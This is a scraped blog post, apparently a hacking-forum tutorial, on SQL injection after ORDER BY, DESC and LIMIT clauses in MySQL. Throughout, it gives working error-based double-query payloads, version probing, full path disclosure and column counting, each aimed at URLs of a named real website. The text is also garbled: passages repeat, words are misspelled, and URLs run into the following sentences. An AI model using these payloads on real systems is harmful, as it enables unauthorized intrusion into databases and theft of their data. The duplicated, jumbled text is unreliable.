11.28
Unknown
this tut will give you instructions how to inject after order by/limit.
like that
here - injection point.
we cant use union after those clauses,so we gonna play with the other things we can do.
after order by id [here]
using double query.
if we have this site (thanks to Rohan_x)
the injection point is after order by.
i know i can use union in another injection point,i do it for the tut.
after order by its simple,the only things we cant use is-
union,having,where,and some more things that dosent matter.
we can use 'and' for double query.
'5.0.95-community'
after limit 10,10 [here]
using some tricks.
like this site-
like that
PHP Code:
SELET * FROM page WHERE id=1 ORDER BY id [here] ASC [here] LIMIT 10,10 [here] we cant use union after those clauses,so we gonna play with the other things we can do.
after order by id [here]
using double query.
if we have this site (thanks to Rohan_x)
Code:
http://www.teletec.com.pk/include/products.php?sb=id
i know i can use union in another injection point,i do it for the tut.
after order by its simple,the only things we cant use is-
union,having,where,and some more things that dosent matter.
we can use 'and' for double query.
Code:
http://www.teletec.com.pk/include/products.php?sb=id and (select count(*) from products group by concat(version(),0x27202020,floor(rand(0)*2-1)))--
(i used the table 'products' because i can see that this table exist from the error. if you cant see the table,use 'information_schema.columns'.)
after desc/asc [here]
using double query.
if we have this site
after desc/asc [here]
using double query.
if we have this site
Code:
http://www.teletec.com.pk/include/products.php?sb=id desc'the injection point is after desc.
after desc/asc its little more problem,because we cant use-
union,having,where,and,or,xor,*,>,so we cant execute our query.
so we add a comma,and the double query after that.
'5.0.95-community'
union,having,where,and,or,xor,*,>,so we cant execute our query.
so we add a comma,and the double query after that.
Code:
http://www.teletec.com.pk/include/products.php?sb=id desc,(select count(*) from users group by concat(version(),0x27202020,floor(rand(0)*2-1)))
note-if the injection point is like that-
PHP Code:
SELECT * FROM page WHERE id=1 ORDER BY [here] id just add '1' and inject like that first example.
Code:
1 and (select count(*) from products group by concat(version(),0x27202020,floor(rand(0)*2-1)))--after limit 10,10 [here]
using some tricks.
like this site-
Code:
http://www.teletec.com.pk/include/products.php?rw=10injetion point after limit clause.
when the injection point is after limit clause,we cant do anything,only those commands-
offset,into,into outfile/dumpfile,/*!*/,for update,lock in share mode.
so we try to exploit what we can.
toc-
get the version
full path disclosure
find column count
get the version (thanks to lolalu0)
we can use comments for getting the mysql version.
we can guess it,and if its true,the page will not load,just like blind,but different.
offset,into,into outfile/dumpfile,/*!*/,for update,lock in share mode.
so we try to exploit what we can.
toc-
get the version
full path disclosure
find column count
get the version (thanks to lolalu0)
we can use comments for getting the mysql version.
we can guess it,and if its true,the page will not load,just like blind,but different.
Code:
http://www.teletec.com.pk/include/products.php?rw=10 /*!50094aaaa*/page dont load-version bigger then 5.00.94
Code:
http://www.teletec.com.pk/include/products.php?rw=10 /*!50096aaaa*/page load normally- version smaller than 5.00.96
Code:
http://www.teletec.com.pk/include/products.php?rw=10 /*!50095aaaa*/page dont load- version is 5.00.95.
FPD
for Full Path Disclosure,we can 0 or /**/ the limit clause,and error with the full path will appear,even mysql_error is on.
for example
FPD
for Full Path Disclosure,we can 0 or /**/ the limit clause,and error with the full path will appear,even mysql_error is on.
for example
Code:
http://www.teletec.com.pk/include/products.php?rw=0final query-
PHP Code:
select * from....limit 0,0 and
we can also
Code:
http://www.teletec.com.pk/include/products.php?rw=/**/1Warning: Division by zero in /home/teletec/public_html/include/products.php on line 164
find the column count
using into.
its not really will help,but its nice trick.
if we have this site-
find the column count
using into.
its not really will help,but its nice trick.
if we have this site-
Code:
http://www.teletec.com.pk/include/products.php?rw=10injection point is after limit.
we can count the columns like that-
we can count the columns like that-
Code:
http://www.teletec.com.pk/include/products.php?rw=10 into @
error 1222.
not 1 column.
not 1 column.
Code:
http://www.teletec.com.pk/include/products.php?rw=10 into @,@
error 1222.
not 2 column.
and so on until-
not 2 column.
and so on until-
Code:
http://www.teletec.com.pk/include/products.php?rw=10 into @,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@
error 1172 "Result consisted of more than one row".
60 columns.
hope you learned something
60 columns.
hope you learned something
Author ::: Benzi
Posted in
0 komentar:
Posting Komentar